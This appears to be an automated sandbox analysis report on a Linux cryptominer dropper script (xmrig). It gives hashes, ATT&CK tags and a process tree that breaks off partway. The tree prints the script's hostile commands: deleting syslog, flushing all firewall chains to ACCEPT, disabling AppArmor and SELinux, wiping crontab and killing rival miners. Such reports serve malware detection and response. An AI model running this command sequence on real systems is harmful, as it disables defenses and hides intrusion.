xmrig_linux | f5462666cfd610336545233aba5f6014699d4b07829c856d0b99956075f7331b

General

Target

a.sh
Size

6KB
MD5

e97dee2d99e3bd5150abdfb488aafeb8
SHA1

8a9b089a194b383b2202457afa1e0b3ec8fc4d3f
SHA256

f5462666cfd610336545233aba5f6014699d4b07829c856d0b99956075f7331b
SHA512

1d572bc3c7642ea007d441865c879ce4037848210a5194ea1bf262af22e9b84e674c067138531672758e2fbf7a53e82820502736827366d4688180c1f6bcfa25
SSDEEP

192:mRoo5wsIGV7DDf6jlpTWg3vMGQit/3PCd/8PY3+R3YB:mao5wgV7DDf6jlpTWg3vMGQit/3PCd//

Score

10^/10

xmrig_linux defense_evasion discovery evasion miner privilege_escalation rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
evasion

Clear Linux or Mac System Logs
T1070.002

Processes:

rm

description ioc process

File deleted /var/log/syslog rm
Flushes firewall rules 3 IoCs
Flushes/ disables firewall rules inside the Linux kernel.

Processes:

ufwiptablesupdate-rc.d

pid process

1553 ufw
1725 iptables
1881 update-rc.d
Loads a kernel module 1 IoCs
Loads a Linux kernel module, potentially to achieve persistence
rootkit

Processes:

modprobe

ioc pid process

/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1557 modprobe
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
privilege_escalation defense_evasion

Sudo and Sudo Caching
T1548.003

Processes:

sudo

pid process

1517 sudo

description	ioc	process
File deleted	/var/log/syslog	rm

pid	process
1553	ufw
1725	iptables
1881	update-rc.d

ioc	pid	process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1557	modprobe

pid	process
1517	sudo

Disables AppArmor 28 IoCs

Disables AppArmor security module.

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

pid	process
1895	systemctl
1880	systemctl
1889	systemctl
1889	systemctl
1860	systemctl
1889	systemctl
1889	systemctl
1860	systemctl
1880	systemctl
1885	systemctl
1885	systemctl
1885	systemctl
1897	systemctl
1905	systemctl
1860	systemctl
1860	systemctl
1873	systemctl
1880	systemctl
1880	systemctl
1885	systemctl
1889	systemctl
1860	systemctl
1860	systemctl
1880	systemctl
1885	systemctl
1889	systemctl
1880	systemctl
1885	systemctl

Disables SELinux 1 IoCs
Disables SELinux security module.

Processes:

setenforce

pid process

1859 setenforce
Enumerates running processes
Discovers information about currently running processes on the system
Changes its process name 1 IoCs

Processes:

description ioc pid

Changes the process name, possibly in an attempt to hide itself (sysv-install) 1877

pid	process
1859	setenforce

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	1877

Reads CPU attributes 1 TTPs 14 IoCs

discovery

System Information Discovery

T1082

Processes:

pkillpspkillpgreppgreppkillpkillpkillpspgreppgreppkillpspgrep

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
discovery

System Information Discovery
T1082

Processes:

modprobe

description ioc process

File opened for reading /sys/module/ip6_tables/initstate modprobe
File opened for reading /sys/module/x_tables/initstate modprobe

description	ioc	process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

killallkillallpspspgreppkillpgreppkillpgreppkillpkillpkillpspkillkillallkillallkillallkillallkillallawkpgreppgrep

description	ioc	process
File opened for reading	/proc/183/stat	killall
File opened for reading	/proc/15/cmdline	killall
File opened for reading	/proc/616/cmdline	ps
File opened for reading	/proc/1092/status	ps
File opened for reading	/proc/1154/cmdline	ps
File opened for reading	/proc/176/cmdline	pgrep
File opened for reading	/proc/89/cmdline	pkill
File opened for reading	/proc/1296/status	pgrep
File opened for reading	/proc/85/cmdline	pkill
File opened for reading	/proc/553/cmdline	ps
File opened for reading	/proc/82/cmdline	pgrep
File opened for reading	/proc/1508/cmdline	ps
File opened for reading	/proc/16/cmdline	pgrep
File opened for reading	/proc/1508/cmdline	pgrep
File opened for reading	/proc/1075/cmdline	pgrep
File opened for reading	/proc/1026/cmdline	pkill
File opened for reading	/proc/422/cmdline	pkill
File opened for reading	/proc/188/status	pkill
File opened for reading	/proc/27/stat	killall
File opened for reading	/proc/559/status	ps
File opened for reading	/proc/177/cmdline	pkill
File opened for reading	/proc/26/cmdline	pkill
File opened for reading	/proc/772/cmdline	pkill
File opened for reading	/proc/994/stat	killall
File opened for reading	/proc/25/stat	killall
File opened for reading	/proc/1141/cmdline	pkill
File opened for reading	/proc/442/cmdline	pkill
File opened for reading	/proc/30/status	pkill
File opened for reading	/proc/1191/cmdline	pkill
File opened for reading	/proc/572/cmdline	pkill
File opened for reading	/proc/485/stat	ps
File opened for reading	/proc/1179/status	pgrep
File opened for reading	/proc/1072/stat	killall
File opened for reading	/proc/1146/stat	killall
File opened for reading	/proc/31/cmdline	ps
File opened for reading	/proc/485/cmdline	ps
File opened for reading	/proc/485/cmdline	pkill
File opened for reading	/proc/9/stat	killall
File opened for reading	/proc/1129/stat	killall
File opened for reading	/proc/1133/cmdline	killall
File opened for reading	/proc/1318/stat	killall
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/185/cmdline	pkill
File opened for reading	/proc/1026/cmdline	pkill
File opened for reading	/proc/1355/cmdline	killall
File opened for reading	/proc/13/status	pgrep
File opened for reading	/proc/23/cmdline	pgrep
File opened for reading	/proc/1141/status	pgrep
File opened for reading	/proc/1101/cmdline	pkill
File opened for reading	/proc/1510/cmdline	pkill
File opened for reading	/proc/179/status	ps
File opened for reading	/proc/434/status	pgrep
File opened for reading	/proc/25/status	pkill
File opened for reading	/proc/177/stat	killall
File opened for reading	/proc/171/cmdline	pgrep
File opened for reading	/proc/1072/cmdline	ps
File opened for reading	/proc/1193/status	pkill
File opened for reading	/proc/1515/stat	ps
File opened for reading	/proc/1045/cmdline	pgrep
File opened for reading	/proc/23/status	pkill
File opened for reading	/proc/1101/stat	killall
File opened for reading	/proc/16/cmdline	pgrep
File opened for reading	/proc/175/cmdline	pgrep
File opened for reading	/proc/416/cmdline	pkill

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

a.sh

description ioc process

File opened for modification /tmp/log_rot a.sh

description	ioc	process
File opened for modification	/tmp/log_rot	a.sh

/tmp/a.sh
/tmp/a.sh
1⤵
- Writes file to tmp directory
PID:1510

/bin/grep
grep -v grep
2⤵
PID:1516

/bin/grep
grep .docker
2⤵
PID:1515

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1514

/usr/bin/sudo
sudo -n true
2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1517

/bin/rm
rm -rf /tmp/a.sh /tmp/config-err-9v8ijU /tmp/netplan_6o2m7k83 /tmp/snap-private-tmp /tmp/ssh-X651Ud74vhtf /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-MRYxba
2⤵
PID:1519

/bin/rm
rm -rf /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-nNGoa6 /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-fmSYoe /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-3TrBTk /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-b8W9ey /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PIeStI
2⤵
PID:1520

/bin/rm
rm -rf /tmp/. /tmp/.. /tmp/.font-unix /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix
2⤵
PID:1521

/bin/rm
rm -rf /var/tmp/. /var/tmp/..
2⤵
PID:1522

/bin/rm
rm -rf /root/.docker.json
2⤵
PID:1523

/bin/rm
rm -rf /root/.xmrig.json
2⤵
PID:1524

/bin/rm
rm -rf /root/.config/docker.json
2⤵
PID:1525

/bin/rm
rm -rf /root/.config/xmrig.json
2⤵
PID:1526

/usr/bin/pgrep
pgrep kdevtmp
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1528

/usr/bin/pgrep
pgrep kthreaddk
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1529

/usr/bin/pgrep
pgrep kinsing
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1530

/usr/bin/pgrep
pgrep solrd
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1531

/usr/bin/pgrep
pgrep sidekiq
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1532

/usr/bin/pkill
pkill -f kthreaddi
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1536

/usr/bin/pkill
pkill -f kdevtmpfsi
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1537

/usr/bin/pkill
pkill -f xmrig
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1538

/usr/bin/pkill
pkill -f kinsing
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1539

/usr/bin/pkill
pkill -f systemdd-dev
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1540

/usr/bin/killall
killall -9 .dockerd
2⤵
- Reads runtime system information
PID:1541

/usr/bin/killall
killall -9 .docker
2⤵
- Reads runtime system information
PID:1542

/usr/bin/killall
killall -9 xmrig
2⤵
- Reads runtime system information
PID:1543

/usr/bin/killall
killall -9 kthreaddi
2⤵
- Reads runtime system information
PID:1544

/usr/bin/killall
killall -9 kdevtmpfsi
2⤵
PID:1545

/usr/bin/killall
killall -9 kinsing
2⤵
- Reads runtime system information
PID:1546

/usr/bin/killall
killall -9 ssrr
2⤵
- Reads runtime system information
PID:1547

/usr/bin/killall
killall -9 .dockerd
2⤵
- Reads runtime system information
PID:1548

/usr/bin/killall
killall -9 .docker
2⤵
PID:1549

/usr/bin/killall
killall /bin/bash /var/tmp/.dockerd
2⤵
PID:1550

/usr/bin/killall
killall /bin/bash /.docker
2⤵
PID:1551

/bin/rm
rm -rf /var/log/syslog
2⤵
- Deletes system logs
PID:1552

/usr/sbin/ufw
ufw disable
2⤵
- Flushes firewall rules
PID:1553

/sbin/iptables
/sbin/iptables -V
3⤵
PID:1554

/lib/ufw/ufw-init
/lib/ufw/ufw-init force-stop
3⤵
PID:1555

/sbin/ip6tables
ip6tables -L INPUT -n
4⤵
PID:1556

/sbin/modprobe
/sbin/modprobe ip6_tables
5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
PID:1557

/sbin/iptables
iptables -F ufw-logging-deny
4⤵
PID:1561

/sbin/iptables
iptables -F ufw-logging-allow
4⤵
PID:1564

/sbin/iptables
iptables -F ufw-not-local
4⤵
PID:1565

/sbin/iptables
iptables -F ufw-user-logging-input
4⤵
PID:1566

/sbin/iptables
iptables -F ufw-user-limit-accept
4⤵
PID:1567

/sbin/iptables
iptables -F ufw-user-limit
4⤵
PID:1568

/sbin/iptables
iptables -F ufw-skip-to-policy-input
4⤵
PID:1569

/sbin/iptables
iptables -F ufw-reject-input
4⤵
PID:1570

/sbin/iptables
iptables -F ufw-after-logging-input
4⤵
PID:1571

/sbin/iptables
iptables -F ufw-after-input
4⤵
PID:1572

/sbin/iptables
iptables -F ufw-user-input
4⤵
PID:1573

/sbin/iptables
iptables -F ufw-before-input
4⤵
PID:1574

/sbin/iptables
iptables -F ufw-before-logging-input
4⤵
PID:1575

/sbin/iptables
iptables -F ufw-skip-to-policy-forward
4⤵
PID:1576

/sbin/iptables
iptables -F ufw-reject-forward
4⤵
PID:1577

/sbin/iptables
iptables -F ufw-after-logging-forward
4⤵
PID:1578

/sbin/iptables
iptables -F ufw-after-forward
4⤵
PID:1579

/sbin/iptables
iptables -F ufw-user-logging-forward
4⤵
PID:1580

/sbin/iptables
iptables -F ufw-user-forward
4⤵
PID:1581

/sbin/iptables
iptables -F ufw-before-forward
4⤵
PID:1582

/sbin/iptables
iptables -F ufw-before-logging-forward
4⤵
PID:1583

/sbin/iptables
iptables -F ufw-track-forward
4⤵
PID:1584

/sbin/iptables
iptables -F ufw-track-output
4⤵
PID:1585

/sbin/iptables
iptables -F ufw-track-input
4⤵
PID:1586

/sbin/iptables
iptables -F ufw-skip-to-policy-output
4⤵
PID:1587

/sbin/iptables
iptables -F ufw-reject-output
4⤵
PID:1588

/sbin/iptables
iptables -F ufw-after-logging-output
4⤵
PID:1589

/sbin/iptables
iptables -F ufw-after-output
4⤵
PID:1590

/sbin/iptables
iptables -F ufw-user-logging-output
4⤵
PID:1591

/sbin/iptables
iptables -F ufw-user-output
4⤵
PID:1592

/sbin/iptables
iptables -F ufw-before-output
4⤵
PID:1593

/sbin/iptables
iptables -F ufw-before-logging-output
4⤵
PID:1594

/sbin/iptables
iptables -Z ufw-logging-deny
4⤵
PID:1595

/sbin/iptables
iptables -Z ufw-logging-allow
4⤵
PID:1596

/sbin/iptables
iptables -Z ufw-not-local
4⤵
PID:1597

/sbin/iptables
iptables -Z ufw-user-logging-input
4⤵
PID:1598

/sbin/iptables
iptables -Z ufw-user-limit-accept
4⤵
PID:1599

/sbin/iptables
iptables -Z ufw-user-limit
4⤵
PID:1600

/sbin/iptables
iptables -Z ufw-skip-to-policy-input
4⤵
PID:1601

/sbin/iptables
iptables -Z ufw-reject-input
4⤵
PID:1602

/sbin/iptables
iptables -Z ufw-after-logging-input
4⤵
PID:1603

/sbin/iptables
iptables -Z ufw-after-input
4⤵
PID:1604

/sbin/iptables
iptables -Z ufw-user-input
4⤵
PID:1605

/sbin/iptables
iptables -Z ufw-before-input
4⤵
PID:1606

/sbin/iptables
iptables -Z ufw-before-logging-input
4⤵
PID:1607

/sbin/iptables
iptables -Z ufw-skip-to-policy-forward
4⤵
PID:1608

/sbin/iptables
iptables -Z ufw-reject-forward
4⤵
PID:1609

/sbin/iptables
iptables -Z ufw-after-logging-forward
4⤵
PID:1610

/sbin/iptables
iptables -Z ufw-after-forward
4⤵
PID:1611

/sbin/iptables
iptables -Z ufw-user-logging-forward
4⤵
PID:1612

/sbin/iptables
iptables -Z ufw-user-forward
4⤵
PID:1613

/sbin/iptables
iptables -Z ufw-before-forward
4⤵
PID:1614

/sbin/iptables
iptables -Z ufw-before-logging-forward
4⤵
PID:1615

/sbin/iptables
iptables -Z ufw-track-forward
4⤵
PID:1616

/sbin/iptables
iptables -Z ufw-track-output
4⤵
PID:1617

/sbin/iptables
iptables -Z ufw-track-input
4⤵
PID:1618

/sbin/iptables
iptables -Z ufw-skip-to-policy-output
4⤵
PID:1619

/sbin/iptables
iptables -Z ufw-reject-output
4⤵
PID:1620

/sbin/iptables
iptables -Z ufw-after-logging-output
4⤵
PID:1621

/sbin/iptables
iptables -Z ufw-after-output
4⤵
PID:1622

/sbin/iptables
iptables -Z ufw-user-logging-output
4⤵
PID:1623

/sbin/iptables
iptables -Z ufw-user-output
4⤵
PID:1624

/sbin/iptables
iptables -Z ufw-before-output
4⤵
PID:1625

/sbin/iptables
iptables -Z ufw-before-logging-output
4⤵
PID:1626

/sbin/iptables
iptables -X ufw-logging-deny
4⤵
PID:1627

/sbin/iptables
iptables -X ufw-logging-allow
4⤵
PID:1628

/sbin/iptables
iptables -X ufw-not-local
4⤵
PID:1629

/sbin/iptables
iptables -X ufw-user-logging-input
4⤵
PID:1630

/sbin/iptables
iptables -X ufw-user-logging-output
4⤵
PID:1631

/sbin/iptables
iptables -X ufw-user-logging-forward
4⤵
PID:1632

/sbin/iptables
iptables -X ufw-user-limit-accept
4⤵
PID:1633

/sbin/iptables
iptables -X ufw-user-limit
4⤵
PID:1634

/sbin/iptables
iptables -X ufw-user-input
4⤵
PID:1635

/sbin/iptables
iptables -X ufw-user-forward
4⤵
PID:1636

/sbin/iptables
iptables -X ufw-user-output
4⤵
PID:1637

/sbin/iptables
iptables -X ufw-skip-to-policy-input
4⤵
PID:1638

/sbin/iptables
iptables -X ufw-skip-to-policy-output
4⤵
PID:1639

/sbin/iptables
iptables -X ufw-skip-to-policy-forward
4⤵
PID:1640

/sbin/iptables
iptables -P INPUT ACCEPT
4⤵
PID:1641

/sbin/iptables
iptables -P OUTPUT ACCEPT
4⤵
PID:1642

/sbin/iptables
iptables -P FORWARD ACCEPT
4⤵
PID:1643

/sbin/ip6tables
ip6tables -F ufw6-logging-deny
4⤵
PID:1644

/sbin/ip6tables
ip6tables -F ufw6-logging-allow
4⤵
PID:1645

/sbin/ip6tables
ip6tables -F ufw6-not-local
4⤵
PID:1646

/sbin/ip6tables
ip6tables -F ufw6-user-logging-input
4⤵
PID:1647

/sbin/ip6tables
ip6tables -F ufw6-user-limit-accept
4⤵
PID:1648

/sbin/ip6tables
ip6tables -F ufw6-user-limit
4⤵
PID:1649

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-input
4⤵
PID:1650

/sbin/ip6tables
ip6tables -F ufw6-reject-input
4⤵
PID:1651

/sbin/ip6tables
ip6tables -F ufw6-after-logging-input
4⤵
PID:1652

/sbin/ip6tables
ip6tables -F ufw6-after-input
4⤵
PID:1653

/sbin/ip6tables
ip6tables -F ufw6-user-input
4⤵
PID:1654

/sbin/ip6tables
ip6tables -F ufw6-before-input
4⤵
PID:1655

/sbin/ip6tables
ip6tables -F ufw6-before-logging-input
4⤵
PID:1656

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-forward
4⤵
PID:1657

/sbin/ip6tables
ip6tables -F ufw6-reject-forward
4⤵
PID:1658

/sbin/ip6tables
ip6tables -F ufw6-after-logging-forward
4⤵
PID:1659

/sbin/ip6tables
ip6tables -F ufw6-after-forward
4⤵
PID:1660

/sbin/ip6tables
ip6tables -F ufw6-user-logging-forward
4⤵
PID:1661

/sbin/ip6tables
ip6tables -F ufw6-user-forward
4⤵
PID:1662

/sbin/ip6tables
ip6tables -F ufw6-before-forward
4⤵
PID:1663

/sbin/ip6tables
ip6tables -F ufw6-before-logging-forward
4⤵
PID:1664

/sbin/ip6tables
ip6tables -F ufw6-track-forward
4⤵
PID:1665

/sbin/ip6tables
ip6tables -F ufw6-track-output
4⤵
PID:1666

/sbin/ip6tables
ip6tables -F ufw6-track-input
4⤵
PID:1667

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-output
4⤵
PID:1668

/sbin/ip6tables
ip6tables -F ufw6-reject-output
4⤵
PID:1669

/sbin/ip6tables
ip6tables -F ufw6-after-logging-output
4⤵
PID:1670

/sbin/ip6tables
ip6tables -F ufw6-after-output
4⤵
PID:1671

/sbin/ip6tables
ip6tables -F ufw6-user-logging-output
4⤵
PID:1672

/sbin/ip6tables
ip6tables -F ufw6-user-output
4⤵
PID:1673

/sbin/ip6tables
ip6tables -F ufw6-before-output
4⤵
PID:1674

/sbin/ip6tables
ip6tables -F ufw6-before-logging-output
4⤵
PID:1675

/sbin/ip6tables
ip6tables -Z ufw6-logging-deny
4⤵
PID:1676

/sbin/ip6tables
ip6tables -Z ufw6-logging-allow
4⤵
PID:1677

/sbin/ip6tables
ip6tables -Z ufw6-not-local
4⤵
PID:1678

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-input
4⤵
PID:1679

/sbin/ip6tables
ip6tables -Z ufw6-user-limit-accept
4⤵
PID:1680

/sbin/ip6tables
ip6tables -Z ufw6-user-limit
4⤵
PID:1681

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-input
4⤵
PID:1682

/sbin/ip6tables
ip6tables -Z ufw6-reject-input
4⤵
PID:1683

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-input
4⤵
PID:1684

/sbin/ip6tables
ip6tables -Z ufw6-after-input
4⤵
PID:1685

/sbin/ip6tables
ip6tables -Z ufw6-user-input
4⤵
PID:1686

/sbin/ip6tables
ip6tables -Z ufw6-before-input
4⤵
PID:1687

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-input
4⤵
PID:1688

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-forward
4⤵
PID:1689

/sbin/ip6tables
ip6tables -Z ufw6-reject-forward
4⤵
PID:1690

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-forward
4⤵
PID:1691

/sbin/ip6tables
ip6tables -Z ufw6-after-forward
4⤵
PID:1692

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-forward
4⤵
PID:1693

/sbin/ip6tables
ip6tables -Z ufw6-user-forward
4⤵
PID:1694

/sbin/ip6tables
ip6tables -Z ufw6-before-forward
4⤵
PID:1695

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-forward
4⤵
PID:1696

/sbin/ip6tables
ip6tables -Z ufw6-track-forward
4⤵
PID:1697

/sbin/ip6tables
ip6tables -Z ufw6-track-output
4⤵
PID:1698

/sbin/ip6tables
ip6tables -Z ufw6-track-input
4⤵
PID:1699

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-output
4⤵
PID:1700

/sbin/ip6tables
ip6tables -Z ufw6-reject-output
4⤵
PID:1701

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-output
4⤵
PID:1702

/sbin/ip6tables
ip6tables -Z ufw6-after-output
4⤵
PID:1703

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-output
4⤵
PID:1704

/sbin/ip6tables
ip6tables -Z ufw6-user-output
4⤵
PID:1705

/sbin/ip6tables
ip6tables -Z ufw6-before-output
4⤵
PID:1706

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-output
4⤵
PID:1707

/sbin/ip6tables
ip6tables -X ufw6-logging-deny
4⤵
PID:1708

/sbin/ip6tables
ip6tables -X ufw6-logging-allow
4⤵
PID:1709

/sbin/ip6tables
ip6tables -X ufw6-not-local
4⤵
PID:1710

/sbin/ip6tables
ip6tables -X ufw6-user-logging-input
4⤵
PID:1711

/sbin/ip6tables
ip6tables -X ufw6-user-logging-output
4⤵
PID:1712

/sbin/ip6tables
ip6tables -X ufw6-user-logging-forward
4⤵
PID:1713

/sbin/ip6tables
ip6tables -X ufw6-user-limit-accept
4⤵
PID:1714

/sbin/ip6tables
ip6tables -X ufw6-user-limit
4⤵
PID:1715

/sbin/ip6tables
ip6tables -X ufw6-user-input
4⤵
PID:1716

/sbin/ip6tables
ip6tables -X ufw6-user-forward
4⤵
PID:1717

/sbin/ip6tables
ip6tables -X ufw6-user-output
4⤵
PID:1718

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-input
4⤵
PID:1719

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-output
4⤵
PID:1720

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-forward
4⤵
PID:1721

/sbin/ip6tables
ip6tables -P INPUT ACCEPT
4⤵
PID:1722

/sbin/ip6tables
ip6tables -P OUTPUT ACCEPT
4⤵
PID:1723

/sbin/ip6tables
ip6tables -P FORWARD ACCEPT
4⤵
PID:1724

/sbin/iptables
iptables -F
2⤵
- Flushes firewall rules
PID:1725

/usr/sbin/userdel
userdel akay
2⤵
PID:1726

/usr/sbin/userdel
userdel vfinder
2⤵
PID:1730

/bin/grep
grep -i "[a]liyun"
2⤵
PID:1735

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1731

/bin/grep
grep -i "[y]unjing"
2⤵
PID:1737

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1736

/usr/bin/crontab
crontab -r
2⤵
PID:1738

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1744

/bin/grep
grep -v -
2⤵
PID:1743

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1742

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1741

/bin/grep
grep :143
2⤵
PID:1740

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1750

/bin/grep
grep -v -
2⤵
PID:1749

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1748

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1747

/bin/grep
grep :2222
2⤵
PID:1746

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1756

/bin/grep
grep -v -
2⤵
PID:1755

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1754

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1753

/bin/grep
grep :3333
2⤵
PID:1752

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1762

/bin/grep
grep -v -
2⤵
PID:1761

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1760

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1759

/bin/grep
grep :3389
2⤵
PID:1758

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1768

/bin/grep
grep -v -
2⤵
PID:1767

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1766

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1765

/bin/grep
grep :4444
2⤵
PID:1764

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1774

/bin/grep
grep -v -
2⤵
PID:1773

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1772

/usr/bin/awk
awk "{print \$7}"
2⤵
- Reads runtime system information
PID:1771

/bin/grep
grep :5555
2⤵
PID:1770

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1780

/bin/grep
grep -v -
2⤵
PID:1779

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1778

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1777

/bin/grep
grep :6666
2⤵
PID:1776

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1786

/bin/grep
grep -v -
2⤵
PID:1785

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1784

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1783

/bin/grep
grep :6665
2⤵
PID:1782

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1792

/bin/grep
grep -v -
2⤵
PID:1791

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1790

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1789

/bin/grep
grep :6667
2⤵
PID:1788

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1798

/bin/grep
grep -v -
2⤵
PID:1797

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1796

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1795

/bin/grep
grep :7777
2⤵
PID:1794

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1804

/bin/grep
grep -v -
2⤵
PID:1803

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1802

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1801

/bin/grep
grep :8444
2⤵
PID:1800

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1810

/bin/grep
grep -v -
2⤵
PID:1809

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1808

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1807

/bin/grep
grep :3347
2⤵
PID:1806

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1816

/bin/grep
grep -v -
2⤵
PID:1815

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1814

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1813

/bin/grep
grep :14444
2⤵
PID:1812

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1822

/bin/grep
grep -v -
2⤵
PID:1821

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1820

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1819

/bin/grep
grep :14433
2⤵
PID:1818

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1828

/bin/grep
grep -v -
2⤵
PID:1827

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1826

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1825

/bin/grep
grep :13531
2⤵
PID:1824

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1834

/bin/grep
grep -v -
